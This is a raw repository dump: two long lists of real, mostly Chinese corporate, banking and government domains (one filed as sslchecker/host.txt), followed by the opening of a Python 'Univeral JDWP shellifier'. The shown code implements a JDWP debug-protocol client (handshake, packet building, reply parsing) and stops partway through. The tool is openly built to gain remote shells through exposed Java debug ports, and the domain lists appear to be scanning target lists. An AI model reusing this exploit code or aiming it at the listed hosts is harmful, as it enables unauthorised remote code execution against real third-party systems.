eyou.net 342 | didatuan.com 343 | jstv.com 344 | v2ex.com 345 | yesky.com 346 | nsfocus.com 347 | qiushibaike.com 348 | anjuke.com 349 | hexun.com 350 | cmbc.com.cn 351 | founderbn.com 352 | youmi.cn 353 | ceair.com 354 | sdcms.cn 355 | go.cn 356 | now.cn 357 | safedog.cn 358 | hiwifi.com 359 | hiwifi.com 360 | jeecms.com 361 | gewara.com 362 | rong360.com 363 | renrendai.com 364 | zzidc.com 365 | jiuxian.com 366 | yinyuetai.com 367 | tcl.com 368 | sootoo.com 369 | ppdai.com 370 | locojoy.com 371 | 5sing.com 372 | candou.com 373 | appchina.com 374 | 300.cn 375 | phpstat.net 376 | 52pk.com 377 | shendu.com 378 | ccidnet.com 379 | diditaxi.com.cn 380 | jiankongbao.com 381 | tcl.com 382 | aicai.com 383 | smartisan.cn 384 | 2caipiao.com 385 | sto.cn 386 | duokan.com 387 | cndns.com 388 | haier.net 389 | haier.com 390 | ehaier.com 391 | jushanghui.com 392 | hairongyi.com 393 | ooopic.com 394 | autohome.com.cn 395 | che168.com 396 | pp.cc 397 | super8.com.cn 398 | 17k.com 399 | 59.cn 400 | zhaopin.com 401 | amazon.cn 402 | yundaex.com 403 | 51zhangdan.com 404 | leiphone.com 405 | ikuai8.com 406 | aoshitang.com 407 | codoon.com 408 | ztgame.com 409 | moko.cc 410 | nuomi.com 411 | liba.com 412 | tuan800.com 413 | bizcn.com 414 | destoon.com 415 | 22.cn 416 | baofeng.com 417 | zgsj.com 418 | chuangxin.com 419 | diyou.cn 420 | zbird.com 421 | e-chinalife.com 422 | kuaiyong.com 423 | v5shop.com.cn 424 | zuzuche.com 425 | chinapost.com.cn 426 | pook.com 427 | 4.cn 428 | crsky.com 429 | wandoujia.com 430 | oupeng.com 431 | h3c.com 432 | pcauto.com.cn 433 | pclady.com.cn 434 | pcbaby.com.cn 435 | pcgames.com.cn 436 | pchouse.com.cn 437 | baomihua.com 438 | dolphin.com 439 | pcpop.com 440 | itpub.net 441 | zhe800.com 442 | caijing.com.cn 443 | hikvision.com 444 | bitauto.com 445 | fengyunzhibo.com 446 | app111.com 447 | hanweb.com 448 | id5.cn 449 | jumei.com 450 | onefoundation.cn 451 | weipai.cn 452 | zuche.com 453 | sfbest.com 454 | dbappsecurity.com.cn 455 | jobui.com 456 | imobile.com.cn 457 | shenzhenair.com 458 | douguo.com 459 | diyicai.com 460 | kuwo.cn 461 | csair.com 462 | mama.cn 463 | 115.com 464 | foxitsoftware.cn 465 | zto.cn 466 | cofco.com 467 | mycolorway.com 468 | breadtrip.com 469 | qiniu.com 470 | mingdao.com 471 | zoomla.cn 472 | ename.cn 473 | 10086.cn 474 | icafe8.com 475 | anymacro.com 476 | zhujiwu.com 477 | ele.me 478 | phpyun.com 479 | thinkphp.cn 480 | 500wan.com 481 | paidai.com 482 | fumu.com 483 | homeinns.com 484 | chinabank.com.cn 485 | meishichina.com 486 | hinews.cn 487 | jj.cn 488 | immomo.com 489 | cnaaa.com 490 | duobei.com 491 | gw.com.cn 492 | tieyou.com 493 | qibosoft.com 494 | zqgame.com 495 | meilishuo.com 496 | sitestar.cn 497 | qmango.com 498 | sohu.com 499 | onlylady.com 500 | edong.com 501 | 99bill.com 502 | 12321.cn 503 | kongzhong.com 504 | ucloud.cn 505 | kuaidadi.com 506 | cyzone.cn 507 | ujipin.com 508 | 189.cn 509 | damai.cn 510 | jinjianginns.com 511 | stockstar.com 512 | shipin7.com 513 | zdnet.com.cn 514 | segmentfault.com 515 | netentsec.com 516 | spb.gov.cn 517 | cnzxsoft.com 518 | chinaamc.com 519 | jb51.net 520 | cmstop.com 521 | lecai.com 522 | yongche.com 523 | pingan.com 524 | 51credit.com 525 | cnfol.com 526 | china-sss.com 527 | btcchina.com 528 | okcoin.com 529 | kaspersky.com.cn 530 | yinxiang.com 531 | nipic.com 532 | antiy.com 533 | juhe.cn 534 | wumii.org 535 | uzai.com 536 | anzhi.com 537 | yto.net.cn 538 | 58pic.com 539 | t3.com.cn 540 | aibang.com 541 | yaolan.com 542 | zhongchou.com 543 | ubuntu.org.cn 544 | smartisan.com 545 | hb-n-tax.gov.cn 546 | chanjet.com 547 | bytedance.com 548 | 1hai.cn 549 | tebon.com.cn 550 | tdxinfo.com 551 | tujia.com 552 | cmbchina.com 553 | xinnet.com 554 | dbw.cn 555 | pingan.com 556 | legendsec.com 557 | woniu.com 558 | mcafee.com 559 | vasee.com 560 | juesheng.com 561 | wasu.cn 562 | wowsai.com 563 | chinadaily.com.cn 564 | 51talk.com 565 | mbachina.com 566 | ifanr.com 567 | boc.cn 568 | jiathis.com 569 | gongchang.com 570 | nbcb.com.cn 571 | 91160.com 572 | yuantiku.com 573 | imooc.com 574 | gf.com.cn 575 | bangcle.com 576 | zhuqu.com 577 | cnmo.com 578 | 17ugo.com 579 | zcool.com.cn 580 | jiemian.com 581 | creditease.cn 582 | creditease.cn 583 | ebay.com 584 | 12308.com 585 | 7po.com 586 | itenable.com.cn 587 | tesla.cn 588 | szse.cn 589 | enorth.com.cn 590 | newone.com.cn 591 | haodai.com 592 | cdb.com.cn 593 | sino-life.com 594 | coocaa.com 595 | cgbchina.com.cn 596 | 17500.cn 597 | chsi.com.cn 598 | chsi.com.cn 599 | cnpc.com.cn 600 | petrochina.com.cn 601 | welomo.com 602 | zank.mobi 603 | kf5.com 604 | ehaier.com 605 | piccnet.com.cn 606 | 88.com.cn 607 | shenhuagroup.com.cn 608 | unionpayintl.com 609 | unionpay.com 610 | youzu.com 611 | yxdown.com 612 | 56.com 613 | gopay.com.cn 614 | wiwide.com 615 | fesco.com.cn 616 | samsung.com 617 | sfn.cn 618 | chinaums.com 619 | htsc.com.cn 620 | ciwong.com 621 | hp.com 622 | itouzi.com 623 | ecitic.com 624 | to8to.com 625 | camera360.com 626 | cfsc.com.cn 627 | ebscn.com 628 | 24cp.com 629 | chinahr.com 630 | sinopec.com 631 | mcdonalds.com.cn 632 | chexun.com 633 | jinri.cn 634 | psbc.com 635 | swsresearch.com 636 | picchealth.com 637 | cnooc.com.cn 638 | yohobuy.com 639 | h3c.com 640 | icbccs.com.cn 641 | aol.com 642 | umetrip.com 643 | sunits.com 644 | youyuan.com 645 | cdrcb.com 646 | comba.com.cn 647 | adtsec.com 648 | nffund.com 649 | zhaoshang.net 650 | cytobacco.com 651 | weizhonggou.com 652 | addnewer.com 653 | scti.cn 654 | feiniu.com 655 | chinapnr.com 656 | heetian.com 657 | yungouos.com 658 | zjedu.org 659 | ccic-net.com.cn 660 | shengpay.com 661 | yirendai.com 662 | essence.com.cn 663 | 1218.com.cn 664 | 228.com.cn 665 | anbanggroup.com 666 | m6go.com 667 | xiangshe.com 668 | yirendai.com 669 | vvipone.com 670 | 51jingying.com 671 | cmbc.com.cn 672 | 51idc.com 673 | autono1.com 674 | jsbchina.cn 675 | dfzq.com.cn 676 | ssscc.com.cn 677 | chaoxing.com 678 | yingjiesheng.com 679 | thfund.com.cn 680 | duxiu.com 681 | myfund.com 682 | x.com.cn 683 | itouzi.com 684 | cits.cn 685 | lufax.com 686 | hongkongairlines.com 687 | touna.cn 688 | hhedai.com 689 | jinlianchu.com 690 | tsinghua.edu.cn 691 | qufenqi.com 692 | tcl.com 693 | pinganfang.com 694 | boqii.com 695 | plu.cn 696 | flnet.com 697 | beibei.com 698 | mizhe.com 699 | vivo.com.cn 700 | ahtv.cn 701 | daling.com 702 | cankaoxiaoxi.com 703 | s.cn 704 | lingying.com 705 | voc.com.cn 706 | wacai.com 707 | bankofshanghai.com 708 | wukonglicai.com 709 | zszq.com 710 | fanhuan.com 711 | yixin.com 712 | 91jinrong.com 713 | cec.com.cn 714 | jxlife.com.cn 715 | csrc.gov.cn 716 | dianrong.com 717 | leyou.com.cn 718 | benlai.com 719 | cdce.cn 720 | gewara.com 721 | fxiaoke.com 722 | metao.com 723 | minmetals.com.cn 724 | jzjt.com 725 | sinosig.com 726 | umpay.com 727 | sgcc.com.cn 728 | phfund.com.cn 729 | cmfchina.com 730 | ncfund.com.cn 731 | epf.com.cn 732 | fengjr.com 733 | fsfund.com 734 | orient-fund.com 735 | epf.com.cn 736 | gtfund.com 737 | hazq.com 738 | aeonlife.com.cn 739 | jyvpfund.com 740 | lionfund.com.cn 741 | sursen.net 742 | hzhz.co 743 | ctfund.com 744 | hit.edu.cn 745 | fund001.com 746 | 163disk.com 747 | bcia.com.cn 748 | qidian.com 749 | kyfw.12306.cn -------------------------------------------------------------------------------- /sslchecker/host.txt: -------------------------------------------------------------------------------- 1 | tencent.com 2 | baidu.com 3 | sina.com.cn 4 | sohu.com 5 | discuz.net 6 | rising.com.cn 7 | alibaba.com 8 | 360.cn 9 | maxthon.cn 10 | renren.com 11 | ifeng.com 12 | snda.com 13 | sdo.com 14 | sogou.com 15 | 163.com 16 | 9you.com 17 | duba.net 18 | xunlei.com 19 | ctrip.com 20 | 19lou.com 21 | shooter.cn 22 | verycd.com 23 | mop.com 24 | ourgame.com 25 | douban.com 26 | youku.com 27 | wanmei.com 28 | 39.net 29 | uc.cn 30 | pps.tv 31 | taobao.com 32 | blogbus.com 33 | shopex.cn 34 | gtja.com 35 | alipay.com 36 | phpwind.net 37 | ftchinese.com 38 | lenovo.com 39 | www.net.cn 40 | 17173.com 41 | qiyi.com 42 | focus.cn 43 | chinaren.com 44 | tudou.com 45 | ztgame.com 46 | mtime.com 47 | tompda.com 48 | 51.com 49 | shandagames.com 50 | 4399.com 51 | jiepang.com 52 | it168.com 53 | huawei.com 54 | ku6.com 55 | dxy.cn 56 | xiami.com 57 | xywy.com 58 | qunar.com 59 | 7daysinn.cn 60 | phpcms.cn 61 | pipi.cn 62 | 58.com 63 | ganji.com 64 | chinaunix.net 65 | songtaste.com 66 | gaopeng.com 67 | duowan.com 68 | dnspod.cn 69 | tuchong.com 70 | yeepay.com 71 | the9.com 72 | ylmf.com 73 | cnzz.com 74 | lianzhong.com 75 | pindao.com 76 | jd.com 77 | dzwww.com 78 | 91wan.com 79 | guokr.com 80 | newegg.com.cn 81 | lashou.com 82 | 55tuan.com 83 | zhihu.com 84 | cnbeta.com 85 | pptv.com 86 | 9158.com 87 | ubox.cn 88 | hudong.com 89 | sangfor.com.cn 90 | vancl.com 91 | unnoo.com 92 | sucop.com 93 | bianfeng.com 94 | 6.cn 95 | elong.com 96 | 10jqka.com.cn 97 | anquanbao.com 98 | taomee.com 99 | yxlink.com 100 | php.net 101 | coremail.cn 102 | crucco.com 103 | zhenai.com 104 | dangdang.com 105 | aipai.com 106 | xiaomi.com 107 | joy.cn 108 | letao.com 109 | jingwei.com 110 | 51job.com 111 | changyou.com 112 | hada.me 113 | sf-express.com 114 | kingsoft.com 115 | leyou.com 116 | jiayuan.com 117 | soufun.com 118 | youtx.com 119 | lefeng.com 120 | yoybuy.com 121 | eset.com.cn 122 | 7k7k.com 123 | aqgj.cn 124 | guosen.com.cn 125 | ly.com 126 | tom.com 127 | cntv.cn 128 | veryeast.cn 129 | 12306.cn 130 | goodbaby.com 131 | cenwor.com 132 | tttuangou.net 133 | jiangmin.com 134 | yonyou.com 135 | ccw.com.cn 136 | vip.com 137 | ftsafe.com.cn 138 | csdn.net 139 | topsec.com.cn 140 | west263.com 141 | wanda.cn 142 | letv.com 143 | dns.com.cn 144 | diandian.com 145 | kugou.com 146 | syyx.com 147 | xiu.com 148 | baihe.com 149 | kingdee.com 150 | iboxpay.com 151 | 21cn.com 152 | nokia.com 153 | playcool.com 154 | duote.com 155 | wdlinux.cn 156 | yupoo.com 157 | 263.net 158 | coo8.com 159 | 36kr.com 160 | dahe.cn 161 | yahoo.com 162 | cmseasy.cn 163 | tianya.cn 164 | suning.com 165 | zol.com.cn 166 | easybuy.com.cn 167 | gome.com.cn 168 | jiajia.me 169 | 5173.com 170 | baobeihuijia.com 171 | thinksky.hk 172 | neusoft.com 173 | gamemayi.com 174 | 51web.com 175 | dajie.com 176 | qianpin.com 177 | 2345.com 178 | 51cto.com 179 | guang.com 180 | lvmama.com 181 | happigo.com 182 | m18.com 183 | gooann.com 184 | lakala.com 185 | knownsec.com 186 | 99.com 187 | xd.com 188 | jiapin.com 189 | docin.com 190 | ip66.com 191 | tnyoo.com 192 | cwan.com 193 | dianping.com 194 | sclub.com.tw 195 | iciba.com 196 | xoyo.com 197 | ijinshan.com 198 | xueqiu.com 199 | chinacache.com 200 | hx168.com.cn 201 | 17sup.com 202 | mangocity.com 203 | shop.edu.cn 204 | tiexue.net 205 | cpic.com.cn 206 | venustech.com.cn 207 | huatu.com 208 | 178.com 209 | yihaodian.com 210 | house365.com 211 | 51greenorange.com 212 | 360shop.com.cn 213 | weibo.com 214 | touzhu.cn 215 | qiaogu.com 216 | zblogcn.com 217 | firefox.com.cn 218 | xcar.com.cn 219 | goldmail.cn 220 | trip8080.com 221 | baijob.com 222 | zhubajie.com 223 | acfun.tv 224 | qfpay.com 225 | xianguo.com 226 | tp-link.com.cn 227 | zhenpin.com 228 | hiall.com.cn 229 | 800app.com 230 | yuantiku.com 231 | redbaby.com.cn 232 | baixing.com 233 | 2cto.com 234 | linktrust.com.cn 235 | womai.com 236 | tuciabbay.com 237 | 1ting.com 238 | akcms.com 239 | kingosoft.com 240 | meitu.com 241 | meizu.com 242 | taocms.org 243 | 53kf.com 244 | oschina.net 245 | thinksns.com 246 | hxage.com 247 | moliyo.com 248 | 3158.cn 249 | oppo.com 250 | tuniu.com 251 | 3158.com 252 | meituan.com 253 | eversec.com.cn 254 | kuaibo.com 255 | cins.cn 256 | papa.me 257 | 591wed.com 258 | cheshi.com 259 | shopxx.net 260 | shopxx.net 261 | m1905.com 262 | argos.cn 263 | tgbus.com 264 | mafengwo.cn 265 | cnblogs.com 266 | fun.tv 267 | hupu.com 268 | sudu.cn 269 | feng.com 270 | nandu.com 271 | changba.com 272 | jinwankansha.com 273 | 51bi.com 274 | chinaz.com 275 | umeng.com 276 | mogujie.com 277 | xinghua.org.cn 278 | coolping.com 279 | chinanetcenter.com 280 | iyiyun.com 281 | yunyun.com 282 | eguan.cn 283 | winenice.com 284 | opera.com 285 | zhimei.com 286 | tongbu.com 287 | haodf.com 288 | 3322.org 289 | dodonew.com 290 | lesuke.com 291 | iiyi.com 292 | sudytech.com 293 | 8684.cn 294 | bjsako.com 295 | newsmyshop.com 296 | tiancity.com 297 | looyu.com 298 | jollymm.com 299 | dopool.com 300 | fantong.com 301 | zhuna.cn 302 | secoo.com 303 | gamtee.com 304 | huanqiu.com 305 | kanglu.com 306 | wssys.net 307 | xinnet.com 308 | ebrun.com 309 | duoshuo.com 310 | bilibili.tv 311 | gfan.com 312 | pconline.com.cn 313 | 50cms.com 314 | trs.com.cn 315 | xdf.cn 316 | htinns.com 317 | wacai.com 318 | mplife.com 319 | donews.com 320 | qyer.com 321 | 9978.cn 322 | admin5.com 323 | etuan.com 324 | liepin.com 325 | 998.com 326 | eastmoney.com 327 | hc360.com 328 | welove520.com 329 | autonavi.com 330 | lusen.com 331 | ecisp.cn 332 | lightinthebox.com 333 | desdev.cn 334 | sgcc.com.cn 335 | mydrivers.com 336 | zte.com.cn 337 | 56.com 338 | mbaobao.com 339 | airchina.com.cn 340 | spacebuilder.cn 341 | eyou.net 342 | didatuan.com 343 | jstv.com 344 | v2ex.com 345 | yesky.com 346 | nsfocus.com 347 | qiushibaike.com 348 | anjuke.com 349 | hexun.com 350 | cmbc.com.cn 351 | founderbn.com 352 | youmi.cn 353 | ceair.com 354 | sdcms.cn 355 | go.cn 356 | now.cn 357 | safedog.cn 358 | hiwifi.com 359 | hiwifi.com 360 | jeecms.com 361 | gewara.com 362 | rong360.com 363 | renrendai.com 364 | zzidc.com 365 | jiuxian.com 366 | yinyuetai.com 367 | tcl.com 368 | sootoo.com 369 | ppdai.com 370 | locojoy.com 371 | 5sing.com 372 | candou.com 373 | appchina.com 374 | 300.cn 375 | phpstat.net 376 | 52pk.com 377 | shendu.com 378 | ccidnet.com 379 | diditaxi.com.cn 380 | jiankongbao.com 381 | tcl.com 382 | aicai.com 383 | smartisan.cn 384 | 2caipiao.com 385 | sto.cn 386 | duokan.com 387 | cndns.com 388 | haier.net 389 | haier.com 390 | ehaier.com 391 | jushanghui.com 392 | hairongyi.com 393 | ooopic.com 394 | autohome.com.cn 395 | che168.com 396 | pp.cc 397 | super8.com.cn 398 | 17k.com 399 | 59.cn 400 | zhaopin.com 401 | amazon.cn 402 | yundaex.com 403 | 51zhangdan.com 404 | leiphone.com 405 | ikuai8.com 406 | aoshitang.com 407 | codoon.com 408 | ztgame.com 409 | moko.cc 410 | nuomi.com 411 | liba.com 412 | tuan800.com 413 | bizcn.com 414 | destoon.com 415 | 22.cn 416 | baofeng.com 417 | zgsj.com 418 | chuangxin.com 419 | diyou.cn 420 | zbird.com 421 | e-chinalife.com 422 | kuaiyong.com 423 | v5shop.com.cn 424 | zuzuche.com 425 | chinapost.com.cn 426 | pook.com 427 | 4.cn 428 | crsky.com 429 | wandoujia.com 430 | oupeng.com 431 | h3c.com 432 | pcauto.com.cn 433 | pclady.com.cn 434 | pcbaby.com.cn 435 | pcgames.com.cn 436 | pchouse.com.cn 437 | baomihua.com 438 | dolphin.com 439 | pcpop.com 440 | itpub.net 441 | zhe800.com 442 | caijing.com.cn 443 | hikvision.com 444 | bitauto.com 445 | fengyunzhibo.com 446 | app111.com 447 | hanweb.com 448 | id5.cn 449 | jumei.com 450 | onefoundation.cn 451 | weipai.cn 452 | zuche.com 453 | sfbest.com 454 | dbappsecurity.com.cn 455 | jobui.com 456 | imobile.com.cn 457 | shenzhenair.com 458 | douguo.com 459 | diyicai.com 460 | kuwo.cn 461 | csair.com 462 | mama.cn 463 | 115.com 464 | foxitsoftware.cn 465 | zto.cn 466 | cofco.com 467 | mycolorway.com 468 | breadtrip.com 469 | qiniu.com 470 | mingdao.com 471 | zoomla.cn 472 | ename.cn 473 | 10086.cn 474 | icafe8.com 475 | anymacro.com 476 | zhujiwu.com 477 | ele.me 478 | phpyun.com 479 | thinkphp.cn 480 | 500wan.com 481 | paidai.com 482 | fumu.com 483 | homeinns.com 484 | chinabank.com.cn 485 | meishichina.com 486 | hinews.cn 487 | jj.cn 488 | immomo.com 489 | cnaaa.com 490 | duobei.com 491 | gw.com.cn 492 | tieyou.com 493 | qibosoft.com 494 | zqgame.com 495 | meilishuo.com 496 | sitestar.cn 497 | qmango.com 498 | sohu.com 499 | onlylady.com 500 | edong.com 501 | 99bill.com 502 | 12321.cn 503 | kongzhong.com 504 | ucloud.cn 505 | kuaidadi.com 506 | cyzone.cn 507 | ujipin.com 508 | 189.cn 509 | damai.cn 510 | jinjianginns.com 511 | stockstar.com 512 | shipin7.com 513 | zdnet.com.cn 514 | segmentfault.com 515 | netentsec.com 516 | spb.gov.cn 517 | cnzxsoft.com 518 | chinaamc.com 519 | jb51.net 520 | cmstop.com 521 | lecai.com 522 | yongche.com 523 | pingan.com 524 | 51credit.com 525 | cnfol.com 526 | china-sss.com 527 | btcchina.com 528 | okcoin.com 529 | kaspersky.com.cn 530 | yinxiang.com 531 | nipic.com 532 | antiy.com 533 | juhe.cn 534 | wumii.org 535 | uzai.com 536 | anzhi.com 537 | yto.net.cn 538 | 58pic.com 539 | t3.com.cn 540 | aibang.com 541 | yaolan.com 542 | zhongchou.com 543 | ubuntu.org.cn 544 | smartisan.com 545 | hb-n-tax.gov.cn 546 | chanjet.com 547 | bytedance.com 548 | 1hai.cn 549 | tebon.com.cn 550 | tdxinfo.com 551 | tujia.com 552 | cmbchina.com 553 | xinnet.com 554 | dbw.cn 555 | pingan.com 556 | legendsec.com 557 | woniu.com 558 | mcafee.com 559 | vasee.com 560 | juesheng.com 561 | wasu.cn 562 | wowsai.com 563 | chinadaily.com.cn 564 | 51talk.com 565 | mbachina.com 566 | ifanr.com 567 | boc.cn 568 | jiathis.com 569 | gongchang.com 570 | nbcb.com.cn 571 | 91160.com 572 | yuantiku.com 573 | imooc.com 574 | gf.com.cn 575 | bangcle.com 576 | zhuqu.com 577 | cnmo.com 578 | 17ugo.com 579 | zcool.com.cn 580 | jiemian.com 581 | creditease.cn 582 | creditease.cn 583 | ebay.com 584 | 12308.com 585 | 7po.com 586 | itenable.com.cn 587 | tesla.cn 588 | szse.cn 589 | enorth.com.cn 590 | newone.com.cn 591 | haodai.com 592 | cdb.com.cn 593 | sino-life.com 594 | coocaa.com 595 | cgbchina.com.cn 596 | 17500.cn 597 | chsi.com.cn 598 | chsi.com.cn 599 | cnpc.com.cn 600 | petrochina.com.cn 601 | welomo.com 602 | zank.mobi 603 | kf5.com 604 | ehaier.com 605 | piccnet.com.cn 606 | 88.com.cn 607 | shenhuagroup.com.cn 608 | unionpayintl.com 609 | unionpay.com 610 | youzu.com 611 | yxdown.com 612 | 56.com 613 | gopay.com.cn 614 | wiwide.com 615 | fesco.com.cn 616 | samsung.com 617 | sfn.cn 618 | chinaums.com 619 | htsc.com.cn 620 | ciwong.com 621 | hp.com 622 | itouzi.com 623 | ecitic.com 624 | to8to.com 625 | camera360.com 626 | cfsc.com.cn 627 | ebscn.com 628 | 24cp.com 629 | chinahr.com 630 | sinopec.com 631 | mcdonalds.com.cn 632 | chexun.com 633 | jinri.cn 634 | psbc.com 635 | swsresearch.com 636 | picchealth.com 637 | cnooc.com.cn 638 | yohobuy.com 639 | h3c.com 640 | icbccs.com.cn 641 | aol.com 642 | umetrip.com 643 | sunits.com 644 | youyuan.com 645 | cdrcb.com 646 | comba.com.cn 647 | adtsec.com 648 | nffund.com 649 | zhaoshang.net 650 | cytobacco.com 651 | weizhonggou.com 652 | addnewer.com 653 | scti.cn 654 | feiniu.com 655 | chinapnr.com 656 | heetian.com 657 | yungouos.com 658 | zjedu.org 659 | ccic-net.com.cn 660 | shengpay.com 661 | yirendai.com 662 | essence.com.cn 663 | 1218.com.cn 664 | 228.com.cn 665 | anbanggroup.com 666 | m6go.com 667 | xiangshe.com 668 | yirendai.com 669 | vvipone.com 670 | 51jingying.com 671 | cmbc.com.cn 672 | 51idc.com 673 | autono1.com 674 | jsbchina.cn 675 | dfzq.com.cn 676 | ssscc.com.cn 677 | chaoxing.com 678 | yingjiesheng.com 679 | thfund.com.cn 680 | duxiu.com 681 | myfund.com 682 | x.com.cn 683 | itouzi.com 684 | cits.cn 685 | lufax.com 686 | hongkongairlines.com 687 | touna.cn 688 | hhedai.com 689 | jinlianchu.com 690 | tsinghua.edu.cn 691 | qufenqi.com 692 | tcl.com 693 | pinganfang.com 694 | boqii.com 695 | plu.cn 696 | flnet.com 697 | beibei.com 698 | mizhe.com 699 | vivo.com.cn 700 | ahtv.cn 701 | daling.com 702 | cankaoxiaoxi.com 703 | s.cn 704 | lingying.com 705 | voc.com.cn 706 | wacai.com 707 | bankofshanghai.com 708 | wukonglicai.com 709 | zszq.com 710 | fanhuan.com 711 | yixin.com 712 | 91jinrong.com 713 | cec.com.cn 714 | jxlife.com.cn 715 | csrc.gov.cn 716 | dianrong.com 717 | leyou.com.cn 718 | benlai.com 719 | cdce.cn 720 | gewara.com 721 | fxiaoke.com 722 | metao.com 723 | minmetals.com.cn 724 | jzjt.com 725 | sinosig.com 726 | umpay.com 727 | sgcc.com.cn 728 | phfund.com.cn 729 | cmfchina.com 730 | ncfund.com.cn 731 | epf.com.cn 732 | fengjr.com 733 | fsfund.com 734 | orient-fund.com 735 | epf.com.cn 736 | gtfund.com 737 | hazq.com 738 | aeonlife.com.cn 739 | jyvpfund.com 740 | lionfund.com.cn 741 | sursen.net 742 | hzhz.co 743 | ctfund.com 744 | hit.edu.cn 745 | fund001.com 746 | 163disk.com 747 | bcia.com.cn 748 | qidian.com 749 | kyfw.12306.cn -------------------------------------------------------------------------------- /jdwp/jdwpshellifier.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | ################################################################################ 3 | # 4 | # Univeral JDWP shellifier 5 | # 6 | # @_hugsy_ 7 | # 8 | # And special cheers to @lanjelot 9 | # 10 | 11 | import socket 12 | import time 13 | import sys 14 | import struct 15 | import urllib 16 | import argparse 17 | 18 | 19 | 20 | ################################################################################ 21 | # 22 | # JDWP protocol variables 23 | # 24 | HANDSHAKE = "JDWP-Handshake" 25 | 26 | REQUEST_PACKET_TYPE = 0x00 27 | REPLY_PACKET_TYPE = 0x80 28 | 29 | # Command signatures 30 | VERSION_SIG = (1, 1) 31 | CLASSESBYSIGNATURE_SIG = (1, 2) 32 | ALLCLASSES_SIG = (1, 3) 33 | ALLTHREADS_SIG = (1, 4) 34 | IDSIZES_SIG = (1, 7) 35 | CREATESTRING_SIG = (1, 11) 36 | SUSPENDVM_SIG = (1, 8) 37 | RESUMEVM_SIG = (1, 9) 38 | SIGNATURE_SIG = (2, 1) 39 | FIELDS_SIG = (2, 4) 40 | METHODS_SIG = (2, 5) 41 | GETVALUES_SIG = (2, 6) 42 | CLASSOBJECT_SIG = (2, 11) 43 | INVOKESTATICMETHOD_SIG = (3, 3) 44 | REFERENCETYPE_SIG = (9, 1) 45 | INVOKEMETHOD_SIG = (9, 6) 46 | STRINGVALUE_SIG = (10, 1) 47 | THREADNAME_SIG = (11, 1) 48 | THREADSUSPEND_SIG = (11, 2) 49 | THREADRESUME_SIG = (11, 3) 50 | THREADSTATUS_SIG = (11, 4) 51 | EVENTSET_SIG = (15, 1) 52 | EVENTCLEAR_SIG = (15, 2) 53 | EVENTCLEARALL_SIG = (15, 3) 54 | 55 | # Other codes 56 | MODKIND_COUNT = 1 57 | MODKIND_THREADONLY = 2 58 | MODKIND_CLASSMATCH = 5 59 | MODKIND_LOCATIONONLY = 7 60 | EVENT_BREAKPOINT = 2 61 | SUSPEND_EVENTTHREAD = 1 62 | SUSPEND_ALL = 2 63 | NOT_IMPLEMENTED = 99 64 | VM_DEAD = 112 65 | INVOKE_SINGLE_THREADED = 2 66 | TAG_OBJECT = 76 67 | TAG_STRING = 115 68 | TYPE_CLASS = 1 69 | 70 | 71 | ################################################################################ 72 | # 73 | # JDWP client class 74 | # 75 | class JDWPClient: 76 | 77 | def __init__(self, host, port=8000): 78 | self.host = host 79 | self.port = port 80 | self.methods = {} 81 | self.fields = {} 82 | self.id = 0x01 83 | return 84 | 85 | def create_packet(self, cmdsig, data=""): 86 | flags = 0x00 87 | cmdset, cmd = cmdsig 88 | pktlen = len(data) + 11 89 | pkt = struct.pack(">IIccc", pktlen, self.id, chr(flags), chr(cmdset), chr(cmd)) 90 | pkt+= data 91 | self.id += 2 92 | return pkt 93 | 94 | def read_reply(self): 95 | header = self.socket.recv(11) 96 | pktlen, id, flags, errcode = struct.unpack(">IIcH", header) 97 | 98 | if flags == chr(REPLY_PACKET_TYPE): 99 | if errcode : 100 | raise Exception("Received errcode %d" % errcode) 101 | 102 | buf = "" 103 | while len(buf) + 11 < pktlen: 104 | data = self.socket.recv(1024) 105 | if len(data): 106 | buf += data 107 | else: 108 | time.sleep(1) 109 | return buf 110 | 111 | def parse_entries(self, buf, formats, explicit=True): 112 | entries = [] 113 | index = 0 114 | 115 | 116 | if explicit: 117 | nb_entries = struct.unpack(">I", buf[:4])[0] 118 | buf = buf[4:] 119 | else: 120 | nb_entries = 1 121 | 122 | for i in range(nb_entries): 123 | data = {} 124 | for fmt, name in formats: 125 | if fmt == "L" or fmt == 8: 126 | data[name] = int(struct.unpack(">Q",buf[index:index+8]) [0]) 127 | index += 8 128 | elif fmt == "I" or fmt == 4: 129 | data[name] = int(struct.unpack(">I", buf[index:index+4])[0]) 130 | index += 4 131 | elif fmt == 'S': 132 | l = struct.unpack(">I", buf[index:index+4])[0] 133 | data[name] = buf[index+4:index+4+l] 134 | index += 4+l 135 | elif fmt == 'C': 136 | data[name] = ord(struct.unpack(">c", buf[index])[0]) 137 | index += 1 138 | elif fmt == 'Z': 139 | t = ord(struct.unpack(">c", buf[index])[0]) 140 | if t == 115: 141 | s = self.solve_string(buf[index+1:index+9]) 142 | data[name] = s 143 | index+=9 144 | elif t == 73: 145 | data[name] = struct.unpack(">I", buf[index+1:index+5])[0] 146 | buf = struct.unpack(">I", buf[index+5:index+9]) 147 | index=0 148 | 149 | else: 150 | print "Error" 151 | exit(1) 152 | 153 | entries.append( data ) 154 | 155 | return entries 156 | 157 | def format(self, fmt, value): 158 | if fmt == "L" or fmt == 8: 159 | return struct.pack(">Q", value) 160 | elif fmt == "I" or fmt == 4: 161 | return struct.pack(">I", value) 162 | 163 | raise Exception("Unknown format") 164 | 165 | def unformat(self, fmt, value): 166 | if fmt == "L" or fmt == 8: 167 | return struct.unpack(">Q", value[:8])[0] 168 | elif fmt == "I" or fmt == 4: 169 | return struct.unpack(">I", value[:4])[0] 170 | else: 171 | raise Exception("Unknown format") 172 | return 173 | 174 | def start(self): 175 | self.handshake(self.host, self.port) 176 | self.idsizes() 177 | self.getversion() 178 | self.allclasses() 179 | return 180 | 181 | def handshake(self, host, port): 182 | s = socket.socket() 183 | try: 184 | s.connect( (host, port) ) 185 | except socket.error as msg: 186 | raise Exception("Failed to connect: %s" % msg) 187 | 188 | s.send( HANDSHAKE ) 189 | 190 | if s.recv( len(HANDSHAKE) ) != HANDSHAKE: 191 | raise Exception("Failed to handshake") 192 | else: 193 | self.socket = s 194 | 195 | return 196 | 197 | def leave(self): 198 | self.socket.close() 199 | return 200 | 201 | def getversion(self): 202 | self.socket.sendall( self.create_packet(VERSION_SIG) ) 203 | buf = self.read_reply() 204 | formats = [ ('S', "description"), ('I', "jdwpMajor"), ('I', "jdwpMinor"), 205 | ('S', "vmVersion"), ('S', "vmName"), ] 206 | for entry in self.parse_entries(buf, formats, False): 207 | for name,value in entry.iteritems(): 208 | setattr(self, name, value) 209 | return 210 | 211 | @property 212 | def version(self): 213 | return "%s - %s" % (self.vmName, self.vmVersion) 214 | 215 | def 